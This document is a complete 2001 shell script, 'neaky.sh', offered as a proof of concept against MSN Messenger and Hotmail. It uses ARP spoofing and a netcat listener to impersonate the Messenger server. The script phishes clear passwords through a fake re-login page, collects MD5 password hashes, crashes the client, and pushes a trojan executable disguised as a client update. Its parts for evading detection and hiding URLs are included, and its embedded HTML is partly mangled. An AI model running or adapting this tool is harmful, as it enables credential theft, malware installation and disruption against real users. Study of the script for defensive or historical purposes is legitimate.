#!/bin/sh # # // # // neaky.sh # \\ # \\ wiss army knife for Hotmail/Messenger # // # // # # # "Spoofing/brute force/misconception/unexpected input Class Attack" # # # # AUTHOR: Gregory Duchemin ( Aka c3rb3r ) # # COMPANY: NEUROCOM CANADA # 1001 bd Maisonneuve Ouest, suite 200 # H3A 3C8 Montreal (Quebec) CANADA # gdn@neurocom.com # 514 908 6800 # http://www.securite-internet.com # # DATE: January 2001 # # PURPOSE: Will spoof Hotmail/messenger server to recover user # hotmail/password, crash messenger client, remotely inject and # execute malicious exe on the victim host. # # NOTE: U will have to send arp responses by broadcasting your MAC/GATEWAY # to the limited broadcast address/IP Broadcast # otherwise u can still try it on your own gateway or from your provider ;) # As a last resort, u can temporalily modify your DNS entry for # messenger servers. # # REQUIRED: This sploit needs an "arptool" like software and a local www server to work properly. # ================================================================= ########################################################################################## # # THIS SCRIPT IS JUST A PROOF OF CONCEPT AND SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY # ########################################################################################## export delay=100000 ################################### # Things to be configured first ################################### # IP address of messenger server to spoof # It change from client to client, check it by sniffing or u can always # assign as many virtual ip as there are messenger server IP. export messenger="64.4.13.56" # HTTP document root export cgiroot="/usr/local/apache/cgi-bin/" export httproot="/usr/local/apache/htdocs/" # Malicious exe location export malicious_path="/tmp/" export malicious="mmssetup.exe" # Access URI : stupid garbage to hide the real url export relogin="loginid=121EAAAAFBBDC2739121+CooKie=1212198AFEDCDFFF+TimeoftheDAY=231212+PASS=+LOGIN=+BIG-Brother" # Messenger PORT export PORT=1863 # real IP of our fake hotmail server, this host ip export MYIP="192.168.10.17" # number of non read messages, # need at least 1 to stimulate requests from the client export nrmsg="10" #number of non read folders export nrfld="0" #path/filename where to store hotmail password export PASSWORD_HERE="/tmp/hotmail-pass" #path to reach your arp spoofer/flooder export ARP="arptool" ########################################## # End of configuration options ########################################## handl3r() { echo echo "Job finished, hope everything is ok...." echo "see ./log for details." echo html_cleaner sync killall "$ARP" exit } usage() { echo echo -e "Usage: $0 [MODE] \n" echo echo "MODE: 1 / Hotmail web spoof for clear password recovery." echo " 2 / Hotmail weakenned MD5 password Hash recovery for bruteforce." echo " 3 / Messenger Remote CrAsh." echo " 4 / Remote injection of malicious exe." echo echo echo "NOTE: Don't forget to customize settings in the script (the first lines)." echo "NOTE2: This proggy needs a local www and arptool or something similar to broadcast arp response to your LAN. I don't have lust to reinvente the wheel." echo "NOTE3: USE IT ONLY FOR EDUCATIONNAL PURPOSE, NOTHING ILLEGAL PLEASE !" echo echo "DETAILS: attack 1/ will trojanize victim to get back a plain password." echo " attack 2/ will ask for weak md5 hash." echo " attack 3/ will crash the client.(exploitable b.overflow ?)" echo " attack 4/ will upload a fake update, naively installed." echo echo "have a nice day" echo " Gregory Duchemin ( c3rb3r@hotmail.com )" echo echo } if [ $# -lt 1 ]; then usage exit fi export MODE="$1" if [ $MODE -gt 4 ]; then usage exit fi # IP_forwarding should be set to avoid detection/suspicion. sysctl -w net.ipv4.conf.all.forwarding=1 if [ $? -eq 1 ]; then usage echo echo echo "Warning: Unable to set ip_forwarding (not a Linux ?), please configure the script." echo echo fi # automatic configuration of arp broadcasting/spoofing over the Lan. echo echo -n "ARP broadcast : " $ARP -c 1 -s $(ifconfig -a | grep "HWaddr" | awk '{print $5}' | egrep -n '^[0-9]+' | egrep '^1:'| sed '1,$s/^1://') FF:FF:FF:FF:FF:FF $(netstat -rn | grep "UG" | awk '{print $2}' ) $(ifconfig -a | grep "inet" | awk -F ':' '{print $3}' | awk '{print $1}'| egrep -n '^[0-9]+' | egrep '^1:' | awk -F ':' '{print $2}') 2 2>&1 > /dev/null & if [ $? -eq 1 ]; then usage echo echo echo "Error: I need something like arptool to do the job.. even if u have something else but similar, please do the appropriate modifications in the script." echo echo exit fi echo "OK" export TID=$! if [ $MODE = "2" ]; then echo echo "Weak MD5 hashes will be stored in /tmp/md5-password" echo echo fi if [ $MODE = "1" ]; then echo echo "Clear Hotmail/MSN passwords will be stored in /tmp/clear-password" echo echo fi if [ $MODE = "3" ]; then echo echo "Remote client may suddenly die...." echo echo fi if [ $MODE = "4" ]; then if [ ! -f $malicious_path"/$malicious" ]; then echo echo "Please first define the trojan (in the configuration section)" echo echo exit 0 fi echo echo "Remote Injection of junky data." echo echo fi trap handl3r SIGINT function html_builder() { echo -n -e "#!/bin/sh\n cat << __MYGIFT__ Content-type:text/html\n
\"Find
Help
Please re-enter your password at your own risk
<" > $cgiroot"/$relogin" cat /tmp/.mail >> $cgiroot"/$relogin" echo -n -e ">
Password   
Change User
  C3rb3r © 2001 Hotmail/Messenger/MSIE vulnerabilities proof of concept. H0rsemail TERMS OF USE and NOTICES   untrusted Privacy Statement

\n__MYGIFT__\n\n">> $cgiroot"/$relogin" chmod a+x $cgiroot"/$relogin" #echo "This is the false update for messenger." > $httproot"mmssetup.exe" echo "


Thanx for your participation.


C3rb3r." > $httproot"response.html" } html_cleaner() { rm -f $cgiroot"/$relogin" mkdir -p $httproot"$relogin" chmod a+rwx $httproot"$relogin" cp -f $malicious $httproot"$relogin""/mmssetup.exe" rm -f $httproot"response.html" } #IP ALIAS with messenger IP echo echo -n "Interface configuration : " ifconfig eth0:0 inet $messenger echo "OK" echo echo "Waiting for a client n0w...." echo # things are getting serious now, this is the messenger automate: export flag="0" cat /dev/null > ./trace while true do sync ( usleep $delay while true do export parsed="$( egrep -e '(VER [0-9]{1,} ([A-Z0-9]){3,})|OUT|(INF [0-9]{1,})|(USR [0-9]{1,})|(SYN [0-9]{1,} [0-9]{1,})|(CVR [0-9]{1,})|(CHG [0-9]{1,})|(URL [0-9]{1,})' ./log)" if [ "$parsed" != "" ]; then sync export request=$(echo $parsed | awk '{print $1}') export num=$(echo $parsed | awk '{print $2}') case "$request" in VER) usleep $delay cat ./log | sed -e "s/VER/ver/" > ./log echo -e "VER $num MSNP5 MSNP4 CVR0\r" sync usleep $delay ;; INF) cat ./log | sed -e "s/INF/inf/" > ./log export new=$(echo $num | sed -e 's/.$/ /') echo -e "INF $new""MD5\r" usleep $delay ;; USR) cat ./log | sed -e "s/USR/usr/" > ./log export ttype=$(echo $parsed | awk '{print $4}') if [ "$ttype" = "I" ]; then export email=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}') echo "$email" > /tmp/.mail html_builder rm -f /tmp/.mail if [ ! $MODE = "2" ]; then echo -e "USR $num MD5 S "$(date "+%s")"\r" else echo -e "USR $num MD5 S \r" fi else export password=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $5}') if [ $MODE = "2" ]; then echo -e "910 $num \r" usleep $delay echo -e "\n\nHotmail password (MD5 hash) for $email is $password\n\n" >> /tmp/md5-password sync exit fi echo -e "USR $num OK $email $email\r" fi usleep $delay ;; SYN) export syn=$(echo $parsed | sed -e 's/.$/ /' | awk '{print $3}') cat ./log | sed -e "s/SYN/syn/" > ./log export time=$(date "+%s") echo -e "MSG Hotmail Hotmail 331\r\nMIME-Versio\ n: 1.0\r\nContent-Type: text/x-msmsgspro\ file; charset=UTF-8\r\nLoginTime: $time\ \r\nEmailEnabled: 1\r\nMemberIdHigh: 84\ 224\r\nMemberIdLow: 1114357868\r\nlang_pre\ ference: 1033\r\npreferredEmail: \r\ncount\ ry: CA\r\nPostalCode: \r\nGender: M\r\nAge:\ 60\r\nsid: 507\r\nkv: 2\r\nMSPAuth: \ 2AAAAAAA\ AD1ZbiLXW3pZ1*ag4qqsgrQYBo1M3vAfU6971a\ t3erLcBGzQ$$\r\n\r" usleep $delay echo -e "SYN $num $syn\r" usleep $delay sync ;; CVR) export version=$(echo $parsed | awk '{print $8}') cat ./log | sed -e "s/CVR/cvr/" > ./log if [ "$flag" = "0" ]; then if [ $MODE = "4" ]; then echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ ttp://$MYIP\ /$relogin""/$malicious http://$MYIP/$relogin""/$malicious\ \r" else echo -e "CVR $num $version $version 1.0.0863 h\ ttp://$MYIP/\ /mmssetup.exe http://$MYIP\ /\r" fi export flag="1" else if [ "$flag" = "1" ]; then echo -e "$chg" echo -e "MSG Hotmail Hotmail 223\r\nMIME-Versio\ n: 1.0\r\nContent-Type: text/x-msmsgsini\ tialemailnotification; charset=UTF-8\r\n\ \r\nInbox-Unread: $nrmsg \r\nFolders-Unread: $nrfld\ \r\nInbox-URL: /$relogin""\r\nFolders\ -URL: /$relogin""\r\nGet-URL: http\ //$MYIP\r\n\r" if [ $MODE = "4" ]; then echo -e "CVR $num 12.666.666 12.666.666 9.0.0863 h\ ttp://$MYIP/\ mmssetup.exe http://$MYIP/\r" else echo -e "CVR $num $version $version 1.0.0863 h\ ttp://download.microsoft.com/download/\ msnmessenger/Patch/2.1/Win98/EN-US/msg\ strst.dll http://messenger.msn.com/\r" fi export flag="3" echo -e "BPR $num C3rb3r@hotmail.com PHH\r" echo -e "BPR $num C3rb3r@hotmail.com PHW\r\nBPR $num\ c3rb3r@hotmail.com PHM\r\nBPR $num c3rb3r@h\ otmail.com MOB N\r" usleep $delay if [ $MODE = "3" ]; then echo -e "ADD 0 AL Crash Crash \r" usleep $delay exit 0 fi fi fi usleep $delay ;; CHG) export chg=$( echo "$parsed"| egrep "CHG") cat ./log | sed -e "s/CHG/chg/" > ./log usleep $delay ;; OUT) html_cleaner exit 0 ;; URL) cat ./log | sed -e "s/URL/url/" > ./log echo -e "URL $num /www.hotmail.com http://"$MYIP"/c/s.dll/"$relogin 0"\ \r" usleep $delay ;; esac fi done )| nc -w 5 -s $messenger -n -l -p $PORT > ./log 2>/dev/null egrep -e 'OUT' ./log > /dev/null if [ ! $? -eq 1 ]; then echo echo "Victim has signed out...." echo "see ./log for details." echo fi done